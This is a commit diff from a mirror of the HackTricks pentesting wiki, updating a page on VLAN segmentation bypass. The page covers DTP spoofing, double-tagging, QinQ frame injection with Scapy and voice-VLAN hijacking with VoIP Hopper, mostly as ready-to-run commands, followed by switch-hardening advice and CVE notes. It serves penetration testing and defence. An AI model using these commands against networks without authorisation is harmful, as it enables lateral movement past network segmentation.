maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: Research Update: Enhanced src/generic-methodologies-and-reso...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-08-07 08:30:36 +00:00
parent 0f0e4e0900
commit 1d5db450d1
1 changed files with 50 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
View File

@ -31,14 +31,18 @@ Switching to trunk mode will temporarily disrupt connectivity, but this can be r
Virtual interfaces are then created, assigned VLAN IDs, and activated:
```bash
# Legacy (vconfig) still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up
# Modern (ip-link preferred)
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip link set eth0.10 up
sudo ip link set eth0.20 up
```
Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
@ -46,14 +50,12 @@ Subsequently, an address request is made via DHCP. Alternatively, in cases where
```bash
sudo dhclient -v eth0.10
sudo dhclient -v eth0.20
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60
```
Example for manually setting a static IP address on an interface (VLAN 10):
```bash
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
sudo ip addr add 10.10.10.66/24 dev eth0.10
```
Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
@ -81,18 +83,18 @@ $ git clone https://github.com/fleetcaptain/dtp-spoof.git
$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
```
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*:
Recon helper (passively fingerprint the ports DTP state):
```bash
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up
$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
$ sudo python3 dtpscan.py -i eth0
```
Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.
### 2. Double-Tagging (Native-VLAN Abuse)
If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection:
If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can hop to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2025 refresh) automates the injection:
```bash
python3 DoubleTagging.py \
@ -103,15 +105,9 @@ python3 DoubleTagging.py \
--attacker 10.10.1.54
```
Packet walk-through:
1. Outer tag (1) is stripped by the first switch because it matches the native VLAN.
2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.
The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames .
### 3. QinQ (802.1ad) Stacking
Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy:
Many enterprise cores support *Q-in-Q* service-provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for ethertype `0x88a8` and attempt to pop the outer tag with Scapy:
```python
from scapy.all import *
@ -122,6 +118,24 @@ frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")
```
### 4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)
Corporate access ports often sit in an *“access + voice”* configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled.
*VoIP Hopper* (packaged in Kali 2025.2) supports CDP, DHCP options **176/242**, and full LLDP-MED spoofing:
```bash
# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940
# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z
# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN
```
The technique bypasses data/voice separation and is extremely common on enterprise edge switches in 2025 because LLDP auto-policy is enabled by default on many models .
---
## Defensive Recommendations
@ -129,8 +143,20 @@ sendp(frame, iface="eth0")
1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`.
2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`.
3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`.
4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity.
5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
4. Enforce port security, DHCP snooping, dynamic ARP inspection **and 802.1X** to limit rogue Layer-2 activity.
5. Disable LLDP-MED auto voice policies (or lock them to authenticated MAC OUIs) if IP-phone spoofing isnt required.
6. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
---
## Real-World Vendor Vulnerabilities (2022-2024)
Even a perfectly hardened switch configuration can still be undermined by firmware bugs. Recent examples include:
* **CVE-2022-20728† Cisco Aironet/Catalyst Access Points** allow injection from the native VLAN into non-native WLAN VLANs, bypassing wired/wireless segmentation .
* **CVE-2024-20465 (Cisco IOS Industrial Ethernet)** permits ACL bypass on SVIs after toggling Resilient Ethernet Protocol, leaking traffic between VRFs/VLANs. Patch 17.9.5 or later.
Always monitor the vendor advisories for VLAN-related bypass/ACL issues and keep infrastructure images current.
---
@ -139,5 +165,7 @@ sendp(frame, iface="eth0")
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
- VLANPWN attack toolkit <https://github.com/casterbytethrowback/VLANPWN>
- Twingate "What is VLAN Hopping?" (Aug 2024) <https://www.twingate.com/blog/glossary/vlan%20hopping>
- VoIP Hopper project <https://github.com/hmgh0st/voiphopper>
- Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” <https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apvlan-TDTtb4FY>
{{#include ../../banners/hacktricks-training.md}}